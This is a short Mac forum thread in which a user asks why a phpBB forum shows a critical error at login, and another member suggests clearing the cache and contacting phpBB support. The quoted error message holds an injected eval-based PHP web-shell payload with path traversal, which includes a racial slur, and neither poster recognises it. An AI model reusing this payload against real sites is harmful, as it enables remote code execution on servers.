Results 1 to 4 of 4
  1. #1
    Problem when trying to enter in a forum
    bellastrada's Avatar
    Member Since
    Feb 17, 2004
    Location
    Montrťal Qc. Canada
    Posts
    165
    Specs:
    IMac 2.8GHz Dualcore 24'' / 2GB SDRAM / Snow Leopard 10.6.1 / external HD LaCie 500Gb
    Question Problem when trying to enter in a forum
    HI!
    When I try to login this forum (http://www.milmtl.com/forum) I always received this error:

    phpBB : Critical Error

    Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file

    DEBUG MODE

    Line : 335
    File : /home/httpd/vhosts/milmtl.com/httpdocs/forum/includes/functions.php

    I ask the webmaster why this apppened, and he don't know! Maybe somebody knows what he can do! Thanks!
    :cool: The day Microsoft makes something that doesnít suck is probably the day they start making vacuum cleaners... !

    www.icompositions.com/artists/avanos68

  2. #2
    Problem when trying to enter in a forum
    iWhat's Avatar
    Member Since
    Nov 11, 2004
    Location
    Toledo, Ohio
    Posts
    5,736
    Specs:
    Macbook, iMac G5, iPad, iPhone 4, iPod (MANY)!
    I'd try a different browser and/or clear your cache. But it seems like it's a problem on his end to me.

    DJ TiŽsto Rules!

  3. #3
    Problem when trying to enter in a forum
    bellastrada's Avatar
    Member Since
    Feb 17, 2004
    Location
    Montrťal Qc. Canada
    Posts
    165
    Specs:
    IMac 2.8GHz Dualcore 24'' / 2GB SDRAM / Snow Leopard 10.6.1 / external HD LaCie 500Gb
    I already tried another browser (IE, Firefox...) and clearing my cache..same problem!

    I contact the webmaster of the site and he tell me that he don't know where the problem come from, but he knows that it is from his side. Maybe somebody could tell me what he can do to get rid of that problem...

    Quote Originally Posted by iWhat
    DJ TiŽsto Rules!
    Hey!!! A TiŽsto fan! Look there... some pictures I took at the White party in Montrťal :
    http://cf.pg.photos.yahoo.com/ph/avanos_68/my_photos
    :cool: The day Microsoft makes something that doesnít suck is probably the day they start making vacuum cleaners... !

    www.icompositions.com/artists/avanos68

  4. #4
    Problem when trying to enter in a forum
    iWhat's Avatar
    Member Since
    Nov 11, 2004
    Location
    Toledo, Ohio
    Posts
    5,736
    Specs:
    Macbook, iMac G5, iPad, iPhone 4, iPod (MANY)!
    He could go here for support: http://www.phpbb.com/phpBB/

    But, if he should happen not to speak english, he could go here for international support: http://www.phpbb.com/support/intl.php

    Yeah, I actually looked at your album before, because I saw that you like DJ TiŽsto too. But I'll look at them again for fun, because I like him so much. That White Party looked like a blast! I bet you and your friends had a great time there. I could so see myself enjoying something like that. I listened to some of your songs beforehand, very nice work bellastrada.

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Forum Signature Problem
    By Feniks80 in forum Images, Graphic Design, and Digital Photography
    Replies: 0
    Last Post: 08-30-2014, 06:55 PM
  2. Forum pic problem
    By Dale691 in forum iPad Hardware and Accessories
    Replies: 1
    Last Post: 08-14-2010, 05:47 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •